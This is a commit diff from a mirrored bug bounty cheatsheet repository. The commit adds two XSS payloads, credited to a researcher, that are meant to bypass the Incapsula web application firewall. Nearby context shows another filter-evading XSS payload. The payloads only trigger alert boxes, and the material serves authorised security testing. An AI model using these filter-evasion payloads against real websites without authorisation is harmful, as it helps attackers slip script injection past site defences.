mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 02:53:06 +00:00
Add Incapsula WAF XSS Bypasses.
This commit is contained in:
parent
d214da501e
commit
8ed19686f1
1 changed files with 10 additions and 0 deletions
|
@ -64,6 +64,16 @@ Note: This kind of depends on what security level the application is set to. See
|
|||
>><marquee loop=1 width=0 onfinish=alert(1)>
|
||||
```
|
||||
|
||||
**Incapsula WAF Bypasses** by [@i_bo0om](https://twitter.com/i_bo0om)
|
||||
|
||||
```html
|
||||
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
|
||||
```
|
||||
|
||||
```html
|
||||
<img/src=q onerror='new Function`al\ert\`1\``'>
|
||||
```
|
||||
|
||||
**jQuery < 3.0.0 XSS**
|
||||
by [Egor Homakov](https://github.com/jquery/jquery/issues/2432)
|
||||
|
||||
|
|
Loading…
Reference in a new issue